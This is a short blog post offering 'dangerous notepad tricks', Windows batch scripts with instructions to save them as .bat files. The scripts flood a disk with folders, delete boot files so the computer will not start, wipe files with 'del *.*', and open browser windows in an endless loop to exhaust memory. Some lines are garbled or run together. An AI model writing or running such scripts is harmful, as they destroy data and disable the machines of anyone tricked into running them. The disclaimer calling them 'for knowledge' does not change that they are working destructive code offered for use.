Hi! frnz. Many of You know about notpad tricks. This post is also related to notepad tricks but dangerous tricks which cannot be used as fun. But also if you want it for knowledge than here are some of them.
md %random%
goto top
But use them in your own risks. In this post you will find code for:
1. Create more than 3,000 folders under a minute
2. Shutdown a computer forever
3. Delete all your system
4. Crashing your RAM
1. Create more than 3,000 folders under a minute
@echo off
:topmd %random%
goto top
2. Shutdown a computer forever
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini
3. Delete all your system
file.
del *.*
4. Crashing your RAM
:A
start http://actiontrick.blogspot.com/
goto A
_________________________________________________________________________________
Type all the above code in notepad and save it as .bat file.
No comments:
Post a Comment